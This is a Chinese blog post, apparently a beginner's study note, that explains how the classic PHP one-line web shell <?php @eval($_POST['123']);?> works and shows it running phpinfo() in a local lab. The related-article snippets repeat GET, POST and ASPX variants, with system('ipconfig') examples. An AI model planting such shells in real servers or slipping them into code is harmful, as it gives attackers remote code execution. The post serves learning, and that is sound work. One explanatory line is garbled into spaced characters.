对一句话木马的初步认识

最新推荐文章于 2022-07-09 10:39:38 发布
最新推荐文章于 2022-07-09 10:39:38 发布
阅读量187 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51504576/article/details/115873410
版权

在之前只停留在怎么使用一句话木马的层次上,但不懂原理总觉得不太踏实,今天稍微查询了一些资料,个人对一句话有了一些了解。
我们分析一下最简单的一句话木马:

<?php
@eval($_POST['123']);
?>

(能理解一句话木马也得益于最近刚好了解了一下php语音)
P O S T [ ] 能 够 将 浏 览 器 的 p o s t 请 求 储 存 在 字 典 里 , _POST[]能够将浏览器的post请求储存在字典里, POST[]post_POST[‘123’]就是调用我们传给服务器关于‘123’的值。eval()是执行代码,@是不让式子报错。
也就是说,我们可以通过post请求向服务器传递一些奇怪的指令。
这里我用phpstudy生成一个环境:
在这里插入图片描述
利用maxhackbar传递参数:
在这里插入图片描述
然后就成功执行了phpinfo():
在这里插入图片描述

wxyccc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
认识木马
kubete的专栏
10-21 1633
       木马的出现让我们损失的不仅仅是电脑控制权,更多的是隐私、金钱甚至是名誉。防范木马已经成为安全领域中最重要的问题之一。可目前各大杀毒厂商还停止在病毒库查杀的方式上,让我们总是慢木马一步。而动辄手工清除木马的教程都要几大篇,其实只要我们具备一些基本的安全知识,完全可以防住木马攻击。    一、认识木马    从本质上说,木马就是一种远程控制软件。不过远程控制软件也有分类。一般来说
深刻认识木马
http://www.softwareace.cn 王牌软件
08-01 594
由浅入深一步步认识木马:    一、什么是特洛伊木马   特洛伊木马(以下简称木马),英文叫做“Trojan horse”,其名称取自希腊神的特洛伊木马记。 古希腊传说,特洛伊王子帕里斯访问希腊,诱走了王后海伦,希腊人因此远征特洛伊。围攻9年后,到第10年,希腊将领奥德修斯
浅谈木马
若谷的博客
01-14 3593
浅谈木马远控在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。环境:攻击者:kali目标主机:Windows一、了解木马1.木马,又...
一句木马
zhao__b的博客
12-03 347
过程中出现乱码可以用这条命令来解决: header('Content-Type: text/html;charset=gbk'); 1.GET 第一步:在www目录下新建一个get.php文件 第二步:进行编辑 <?php @eval($_GET['cmd']);?> 第三步:在网页中打开,里面的 "ipconfig" 也可以换成 "whoami"(%27就是单引号[ ' ]) http://127.0.0.1/get.php?cmd=system(%27ipconfig.
一句木马要点和防范注意事项
最新发布
05-24
"一句木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句cmdshell新型 (非一句木马)
10-30
【PHP 一句 CMDShell 新型(非一句木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句木马是直接执行 PHP ...
一句图片木马讲解.rar
08-25
【标题】"一句图片木马讲解.rar"是一个关于网络安全的压缩包文件,主要涉及的是如何理解和防范"一句图片木马"这一技术手段。在互联网环境中,木马是一种恶意软件,通常用于非法获取用户信息或者控制用户的计算机...
免杀代码—— 一句php
01-15
收集于互联网,仅限个人研究使用。
一句木马的原理
枫梓林のBlog
04-22 6317
一句木马的原理 文章目录一句木马的原理0x00 前言0x01 解析 PHP 一句木马的原理0x02 解析蚁剑连接一句木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 一句后门0x04 JSP一句木马0x05 ASPX一句 0x00 前言 常用的一句后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 一句木马的原理 常用一句木马 php的一句木马: <?php @eval($_POST['pass']);?
使用PHP制作简单的一句木马与PHP中文乱码问题
weixin_59872639的博客
12-03 2873
在phpstudy的根目录下创建一个php文件 然后右键使用编译器打开文件 输入一句木马后保存 <?php @eval($_GET['cmd']); ?> 这是一个使用GET请求头的一句木马,运用的函数为eval() 使用浏览器打开这个php 在搜索栏后面输入 ?cmd=system('ipconfig'); 可以看到,木马已经成功执行 这次使用post请求方法尝试一下 使用post请求方法需要用...
(1)【木马病毒】认识木马:原理、分类、入侵
07-09 1万+
木马病毒-初识】
hackbar执行Linux指令,记一次海洋cms任意代码执行漏洞拿shell(url一句)
weixin_30800615的博客
05-12 676
实验环境:海洋CMS6.54(后续版本已该洞已补)1、后台登录尝试这个站点是个测试站,站里没什么数据。 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破。有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了。后天失败。。。2、网上搜集该CMS的漏洞刚才也说了,这个站没什么数据,都是空的,无上传点。百度搜索海洋CMS的漏洞,有好几个版本的。尝试失败,该版本的漏洞...
一句木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6450
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句木马和菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
网络安全:文件上传 + 一句木马原理 + 菜刀的简单使用
热门推荐
垃圾管理员的垃圾站
09-01 1万+
很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。 这里的疏忽是指,不对用户上传的内容进行检查。 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代码却并没有对文件进行检测: 网页源码(部分截图): php处理源码: 文本也贴出来: File Upload Source vulner...
一句木马原理与实战
V
07-30 3217
一句木马原理与实战介绍常用一句木马分析一句木马一句使用方法实战 介绍 一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句木马 php一句木马:    <?php @eval($_POST[value]);?>    aspx一句木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
excel一句木马
01-26
Excel一句木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值